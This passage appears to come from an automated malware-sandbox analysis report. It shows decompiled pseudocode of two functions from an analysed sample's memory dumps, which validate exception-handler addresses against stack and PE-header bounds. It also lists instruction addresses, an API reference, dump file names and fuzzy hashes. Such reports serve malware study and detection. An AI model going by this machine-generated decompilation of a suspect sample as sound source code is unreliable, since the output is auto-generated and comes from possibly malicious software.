									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xa3d320 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xa3d320 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xa3d360 = 1;
							__eflags =  *0xa3d360;
							if( *0xa3d360 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xa3d320 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xa3d320 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xa3d360 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xa3d320 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xa3d318 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xa3d320 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xa3d320 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                                                                                                  0x00a3b153
                                                                                                                                  0x00a3b156
                                                                                                                                  0x00a3b15c
                                                                                                                                  0x00a3b17a
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b17a
                                                                                                                                  0x00a3b164
                                                                                                                                  0x00a3b16d
                                                                                                                                  0x00a3b173
                                                                                                                                  0x00a3b182
                                                                                                                                  0x00a3b185
                                                                                                                                  0x00a3b188
                                                                                                                                  0x00a3b192
                                                                                                                                  0x00a3b192
                                                                                                                                  0x00a3b194
                                                                                                                                  0x00a3b197
                                                                                                                                  0x00a3b199
                                                                                                                                  0x00a3b199
                                                                                                                                  0x00a3b19b
                                                                                                                                  0x00a3b19e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b1a0
                                                                                                                                  0x00a3b1a2
                                                                                                                                  0x00a3b208
                                                                                                                                  0x00a3b208
                                                                                                                                  0x00a3b366
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b366
                                                                                                                                  0x00a3b1a4
                                                                                                                                  0x00a3b1a4
                                                                                                                                  0x00a3b1a8
                                                                                                                                  0x00a3b1aa
                                                                                                                                  0x00a3b1aa
                                                                                                                                  0x00a3b1aa
                                                                                                                                  0x00a3b1aa
                                                                                                                                  0x00a3b1ad
                                                                                                                                  0x00a3b1ae
                                                                                                                                  0x00a3b1b1
                                                                                                                                  0x00a3b1b1
                                                                                                                                  0x00a3b1b5
                                                                                                                                  0x00a3b1b9
                                                                                                                                  0x00a3b1c7
                                                                                                                                  0x00a3b1c7
                                                                                                                                  0x00a3b1cf
                                                                                                                                  0x00a3b1d5
                                                                                                                                  0x00a3b1d7
                                                                                                                                  0x00a3b1d9
                                                                                                                                  0x00a3b1e9
                                                                                                                                  0x00a3b1f6
                                                                                                                                  0x00a3b1fa
                                                                                                                                  0x00a3b1ff
                                                                                                                                  0x00a3b201
                                                                                                                                  0x00a3b27f
                                                                                                                                  0x00a3b27f
                                                                                                                                  0x00a3b203
                                                                                                                                  0x00a3b203
                                                                                                                                  0x00a3b203
                                                                                                                                  0x00a3b281
                                                                                                                                  0x00a3b283
                                                                                                                                  0x00a3b364
                                                                                                                                  0x00a3b364
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b289
                                                                                                                                  0x00a3b289
                                                                                                                                  0x00a3b290
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b296
                                                                                                                                  0x00a3b29a
                                                                                                                                  0x00a3b2f6
                                                                                                                                  0x00a3b2f8
                                                                                                                                  0x00a3b300
                                                                                                                                  0x00a3b302
                                                                                                                                  0x00a3b304
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b306
                                                                                                                                  0x00a3b30c
                                                                                                                                  0x00a3b30e
                                                                                                                                  0x00a3b310
                                                                                                                                  0x00a3b325
                                                                                                                                  0x00a3b325
                                                                                                                                  0x00a3b327
                                                                                                                                  0x00a3b356
                                                                                                                                  0x00a3b35d
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b35d
                                                                                                                                  0x00a3b32b
                                                                                                                                  0x00a3b32c
                                                                                                                                  0x00a3b32e
                                                                                                                                  0x00a3b330
                                                                                                                                  0x00a3b330
                                                                                                                                  0x00a3b332
                                                                                                                                  0x00a3b334
                                                                                                                                  0x00a3b336
                                                                                                                                  0x00a3b34a
                                                                                                                                  0x00a3b34a
                                                                                                                                  0x00a3b34d
                                                                                                                                  0x00a3b34f
                                                                                                                                  0x00a3b34f
                                                                                                                                  0x00a3b350
                                                                                                                                  0x00a3b350
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b338
                                                                                                                                  0x00a3b338
                                                                                                                                  0x00a3b338
                                                                                                                                  0x00a3b341
                                                                                                                                  0x00a3b342
                                                                                                                                  0x00a3b344
                                                                                                                                  0x00a3b346
                                                                                                                                  0x00a3b346
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b338
                                                                                                                                  0x00a3b336
                                                                                                                                  0x00a3b312
                                                                                                                                  0x00a3b319
                                                                                                                                  0x00a3b319
                                                                                                                                  0x00a3b31b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b31d
                                                                                                                                  0x00a3b31e
                                                                                                                                  0x00a3b321
                                                                                                                                  0x00a3b323
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b323
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b319
                                                                                                                                  0x00a3b29c
                                                                                                                                  0x00a3b29f
                                                                                                                                  0x00a3b2a4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2ad
                                                                                                                                  0x00a3b2af
                                                                                                                                  0x00a3b2b5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2bb
                                                                                                                                  0x00a3b2c1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2c7
                                                                                                                                  0x00a3b2c9
                                                                                                                                  0x00a3b2d2
                                                                                                                                  0x00a3b2d6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2dc
                                                                                                                                  0x00a3b2df
                                                                                                                                  0x00a3b2e1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2e8
                                                                                                                                  0x00a3b2ea
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2ec
                                                                                                                                  0x00a3b2f0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b2f0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b1db
                                                                                                                                  0x00a3b1db
                                                                                                                                  0x00a3b1db
                                                                                                                                  0x00a3b1e2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b1e4
                                                                                                                                  0x00a3b1e5
                                                                                                                                  0x00a3b1e7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b1e7
                                                                                                                                  0x00a3b20f
                                                                                                                                  0x00a3b211
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b221
                                                                                                                                  0x00a3b223
                                                                                                                                  0x00a3b225
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b22b
                                                                                                                                  0x00a3b232
                                                                                                                                  0x00a3b25e
                                                                                                                                  0x00a3b25e
                                                                                                                                  0x00a3b260
                                                                                                                                  0x00a3b262
                                                                                                                                  0x00a3b276
                                                                                                                                  0x00a3b278
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b264
                                                                                                                                  0x00a3b264
                                                                                                                                  0x00a3b264
                                                                                                                                  0x00a3b26d
                                                                                                                                  0x00a3b26e
                                                                                                                                  0x00a3b270
                                                                                                                                  0x00a3b272
                                                                                                                                  0x00a3b272
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b264
                                                                                                                                  0x00a3b234
                                                                                                                                  0x00a3b234
                                                                                                                                  0x00a3b237
                                                                                                                                  0x00a3b239
                                                                                                                                  0x00a3b24b
                                                                                                                                  0x00a3b24b
                                                                                                                                  0x00a3b24e
                                                                                                                                  0x00a3b250
                                                                                                                                  0x00a3b250
                                                                                                                                  0x00a3b251
                                                                                                                                  0x00a3b251
                                                                                                                                  0x00a3b257
                                                                                                                                  0x00a3b257
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b23b
                                                                                                                                  0x00a3b23b
                                                                                                                                  0x00a3b23b
                                                                                                                                  0x00a3b242
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b244
                                                                                                                                  0x00a3b244
                                                                                                                                  0x00a3b245
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b245
                                                                                                                                  0x00a3b247
                                                                                                                                  0x00a3b249
                                                                                                                                  0x00a3b25c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b25c
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b249
                                                                                                                                  0x00a3b1bb
                                                                                                                                  0x00a3b1be
                                                                                                                                  0x00a3b1c1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b1c3
                                                                                                                                  0x00a3b1c5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b1c5
                                                                                                                                  0x00a3b18a
                                                                                                                                  0x00a3b18c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00A3B1FA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryQueryVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2850889275-0
                                                                                                                                  • Opcode ID: 24921445742bf6ff5ab3cf8d056ce8dcd8acb475363d542a2da8a511031fcbd5
                                                                                                                                  • Instruction ID: 186fea2f6cfee54ba90feefc42c54d5a1346d079f91c8d0431832cc42cee40cc
                                                                                                                                  • Opcode Fuzzy Hash: 24921445742bf6ff5ab3cf8d056ce8dcd8acb475363d542a2da8a511031fcbd5
                                                                                                                                  • Instruction Fuzzy Hash: 2061C230A20616DFDB59CF69D8D06AAB3A3FB85354F248229FA15CF5A1E731DC42C760
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D23D5, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D23D5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e8d41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e8d4240 = 1;
										__eflags =  *0x6e8d4240;
										if( *0x6e8d4240 != 0) {
											goto L60;
										}
										_t84 =  *0x6e8d41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e8d4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e8d41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e8d4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e8d41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e8d4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e8d4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e8d4240 = 1;
							__eflags =  *0x6e8d4240;
							if( *0x6e8d4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e8d4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e8d4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e8d4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e8d4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e8d41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e8d4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e8d4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                                                                                                  0x6e8d23df
                                                                                                                                  0x6e8d23e2
                                                                                                                                  0x6e8d23e8
                                                                                                                                  0x6e8d2406
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2406
                                                                                                                                  0x6e8d23f0
                                                                                                                                  0x6e8d23f9
                                                                                                                                  0x6e8d23ff
                                                                                                                                  0x6e8d240e
                                                                                                                                  0x6e8d2411
                                                                                                                                  0x6e8d2414
                                                                                                                                  0x6e8d241e
                                                                                                                                  0x6e8d241e
                                                                                                                                  0x6e8d2420
                                                                                                                                  0x6e8d2423
                                                                                                                                  0x6e8d2425
                                                                                                                                  0x6e8d2425
                                                                                                                                  0x6e8d2427
                                                                                                                                  0x6e8d242a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d242c
                                                                                                                                  0x6e8d242e
                                                                                                                                  0x6e8d2494
                                                                                                                                  0x6e8d2494
                                                                                                                                  0x6e8d25f2
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d25f2
                                                                                                                                  0x6e8d2430
                                                                                                                                  0x6e8d2430
                                                                                                                                  0x6e8d2434
                                                                                                                                  0x6e8d2436
                                                                                                                                  0x6e8d2436
                                                                                                                                  0x6e8d2436
                                                                                                                                  0x6e8d2436
                                                                                                                                  0x6e8d2439
                                                                                                                                  0x6e8d243a
                                                                                                                                  0x6e8d243d
                                                                                                                                  0x6e8d243d
                                                                                                                                  0x6e8d2441
                                                                                                                                  0x6e8d2445
                                                                                                                                  0x6e8d2453
                                                                                                                                  0x6e8d2453
                                                                                                                                  0x6e8d245b
                                                                                                                                  0x6e8d2461
                                                                                                                                  0x6e8d2463
                                                                                                                                  0x6e8d2465
                                                                                                                                  0x6e8d2475
                                                                                                                                  0x6e8d2482
                                                                                                                                  0x6e8d2486
                                                                                                                                  0x6e8d248b
                                                                                                                                  0x6e8d248d
                                                                                                                                  0x6e8d250b
                                                                                                                                  0x6e8d250b
                                                                                                                                  0x6e8d248f
                                                                                                                                  0x6e8d248f
                                                                                                                                  0x6e8d248f
                                                                                                                                  0x6e8d250d
                                                                                                                                  0x6e8d250f
                                                                                                                                  0x6e8d25f0
                                                                                                                                  0x6e8d25f0
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2515
                                                                                                                                  0x6e8d2515
                                                                                                                                  0x6e8d251c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2522
                                                                                                                                  0x6e8d2526
                                                                                                                                  0x6e8d2582
                                                                                                                                  0x6e8d2584
                                                                                                                                  0x6e8d258c
                                                                                                                                  0x6e8d258e
                                                                                                                                  0x6e8d2590
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2592
                                                                                                                                  0x6e8d2598
                                                                                                                                  0x6e8d259a
                                                                                                                                  0x6e8d259c
                                                                                                                                  0x6e8d25b1
                                                                                                                                  0x6e8d25b1
                                                                                                                                  0x6e8d25b3
                                                                                                                                  0x6e8d25e2
                                                                                                                                  0x6e8d25e9
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d25e9
                                                                                                                                  0x6e8d25b7
                                                                                                                                  0x6e8d25b8
                                                                                                                                  0x6e8d25ba
                                                                                                                                  0x6e8d25bc
                                                                                                                                  0x6e8d25bc
                                                                                                                                  0x6e8d25be
                                                                                                                                  0x6e8d25c0
                                                                                                                                  0x6e8d25c2
                                                                                                                                  0x6e8d25d6
                                                                                                                                  0x6e8d25d6
                                                                                                                                  0x6e8d25d9
                                                                                                                                  0x6e8d25db
                                                                                                                                  0x6e8d25db
                                                                                                                                  0x6e8d25dc
                                                                                                                                  0x6e8d25dc
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d25c4
                                                                                                                                  0x6e8d25c4
                                                                                                                                  0x6e8d25c4
                                                                                                                                  0x6e8d25cd
                                                                                                                                  0x6e8d25ce
                                                                                                                                  0x6e8d25d0
                                                                                                                                  0x6e8d25d2
                                                                                                                                  0x6e8d25d2
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d25c4
                                                                                                                                  0x6e8d25c2
                                                                                                                                  0x6e8d259e
                                                                                                                                  0x6e8d25a5
                                                                                                                                  0x6e8d25a5
                                                                                                                                  0x6e8d25a7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d25a9
                                                                                                                                  0x6e8d25aa
                                                                                                                                  0x6e8d25ad
                                                                                                                                  0x6e8d25af
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d25af
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d25a5
                                                                                                                                  0x6e8d2528
                                                                                                                                  0x6e8d252b
                                                                                                                                  0x6e8d2530
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2539
                                                                                                                                  0x6e8d253b
                                                                                                                                  0x6e8d2541
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2547
                                                                                                                                  0x6e8d254d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2553
                                                                                                                                  0x6e8d2555
                                                                                                                                  0x6e8d255e
                                                                                                                                  0x6e8d2562
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2568
                                                                                                                                  0x6e8d256b
                                                                                                                                  0x6e8d256d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2574
                                                                                                                                  0x6e8d2576
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2578
                                                                                                                                  0x6e8d257c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d257c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2467
                                                                                                                                  0x6e8d2467
                                                                                                                                  0x6e8d2467
                                                                                                                                  0x6e8d246e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2470
                                                                                                                                  0x6e8d2471
                                                                                                                                  0x6e8d2473
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2473
                                                                                                                                  0x6e8d249b
                                                                                                                                  0x6e8d249d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24ad
                                                                                                                                  0x6e8d24af
                                                                                                                                  0x6e8d24b1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24b7
                                                                                                                                  0x6e8d24be
                                                                                                                                  0x6e8d24ea
                                                                                                                                  0x6e8d24ea
                                                                                                                                  0x6e8d24ec
                                                                                                                                  0x6e8d24ee
                                                                                                                                  0x6e8d2502
                                                                                                                                  0x6e8d2504
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24f0
                                                                                                                                  0x6e8d24f0
                                                                                                                                  0x6e8d24f0
                                                                                                                                  0x6e8d24f9
                                                                                                                                  0x6e8d24fa
                                                                                                                                  0x6e8d24fc
                                                                                                                                  0x6e8d24fe
                                                                                                                                  0x6e8d24fe
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24f0
                                                                                                                                  0x6e8d24c0
                                                                                                                                  0x6e8d24c3
                                                                                                                                  0x6e8d24c5
                                                                                                                                  0x6e8d24d7
                                                                                                                                  0x6e8d24d7
                                                                                                                                  0x6e8d24da
                                                                                                                                  0x6e8d24dc
                                                                                                                                  0x6e8d24dc
                                                                                                                                  0x6e8d24dd
                                                                                                                                  0x6e8d24dd
                                                                                                                                  0x6e8d24e3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24c7
                                                                                                                                  0x6e8d24c7
                                                                                                                                  0x6e8d24c7
                                                                                                                                  0x6e8d24ce
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24d0
                                                                                                                                  0x6e8d24d0
                                                                                                                                  0x6e8d24d1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24d1
                                                                                                                                  0x6e8d24d3
                                                                                                                                  0x6e8d24d5
                                                                                                                                  0x6e8d24e8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24e8
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24d5
                                                                                                                                  0x6e8d2447
                                                                                                                                  0x6e8d244a
                                                                                                                                  0x6e8d244d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d244f
                                                                                                                                  0x6e8d2451
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2451
                                                                                                                                  0x6e8d2416
                                                                                                                                  0x6e8d2418
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
